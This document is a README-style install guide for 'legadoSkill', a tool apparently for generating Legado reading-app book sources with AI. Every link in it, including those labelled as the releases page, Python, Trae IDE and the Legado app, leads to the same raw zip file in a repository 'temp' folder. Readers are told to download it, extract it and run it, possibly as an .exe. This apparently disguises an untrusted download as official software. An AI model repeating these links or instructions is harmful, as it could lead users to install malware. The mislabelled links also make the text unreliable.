legadoSkill is a tool designed to help you create book sources for the Legado reading app on Android. It uses AI to analyze websites and automatically generate book source files in JSON format. This means you do not have to write code or understand complex programming rules to add new books or content to your Legado app.
This tool looks at the website structure and finds key information: book titles, authors, covers, chapters, and more. It then builds a file that works with Legado's system to make adding new book sources easy and fast.
- A Windows PC.
- Python version 3.8 or newer installed.
You can download Python from python.org. - The AI client called Trae IDE or any other MCP protocol-compatible client. This is where the tool runs and processes your book source requests.
Click this badge or open this link in your web browser:
https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip
You will find the latest version of legadoSkill there.
On the releases page, look for the latest release entry. Download the ZIP file or the package labeled for Windows. Usually, this is a .zip or .exe file.
Save it somewhere easy to find, like the Desktop or Downloads folder.
If you downloaded a ZIP file:
- Right-click the file.
- Choose Extract All.
- Pick a location, such as a new folder on your Desktop.
- Click Extract.
legadoSkill depends on Python packages. To install them:
-
Open the Start menu and type
cmd. Click the Command Prompt app. -
Use the command prompt to go to the folder where you extracted legadoSkill. For example:
cd Desktop\legadoSkill -
Run this command to install dependencies:
pip install -r debugger/requirements.txt
This step ensures all the supporting software packages are ready on your system.
legadoSkill can run in two ways: inside Trae IDE or by using the command line.
- Open Trae IDE on your PC.
- Import or open legadoSkill within the program.
- Use the skill package to input the URL of the website you want to convert into a Legado book source.
- The AI will analyze the site and create the JSON file needed automatically.
This method requires less manual input and works well if you already have Trae IDE set up.
If you want to try the tool without Trae:
-
Open the Command Prompt.
-
Navigate to the folder with legadoSkill.
-
Run the program with a command similar to:
python main.py --url "https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip"
Replace https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip with the address of the site you want to convert.
The tool will analyze the page and output a JSON file matching Legado’s rules.
-
AI-Based Book Source Creation
The system uses AI to recognize the structure of any supported reading website. It finds and extracts book info without you having to configure technical details. -
Built-in Templates and Rules
It includes ready-made selectors and rules to understand how pages are organized and where to find titles, authors, chapters, and more. -
Validation
The generated JSON file is checked to make sure it fits Legado app requirements. This keeps sources working smoothly. -
Self-Improving
The tool can learn from feedback and added knowledge to improve its skill in processing websites. -
Educational Mode
It offers guides and helps you understand concepts if you want to learn how to create or edit book sources yourself.
- Operating System: Windows 10 or higher (64-bit recommended)
- Python: Version 3.8 or newer
- Internet: Required for AI processing and downloading dependencies
- Disk Space: Around 100 MB free for installation and working files
- RAM: At least 4 GB for smooth operation
- Python downloads: https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip
- Trae IDE: https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip (replace with actual link if known)
- Legado reading app: https://raw.githubusercontent.com/rezmdie/legadoSkill/main/temp/番茄小说zym888/Skill_legado_2.3.zip
-
If
pip installgives errors, try upgrading pip first:python -m pip install --upgrade pip -
Confirm Python is added to your system PATH so commands run correctly.
-
Use the exact folder path when typing commands to avoid errors.
-
If AI analysis fails, check the URL is correct and online. Some sites may block bots or require login.
-
Restart your computer if commands or apps behave unexpectedly.
Get the latest release here to start using legadoSkill on Windows. Download the package, install dependencies, and begin converting book sources with AI support.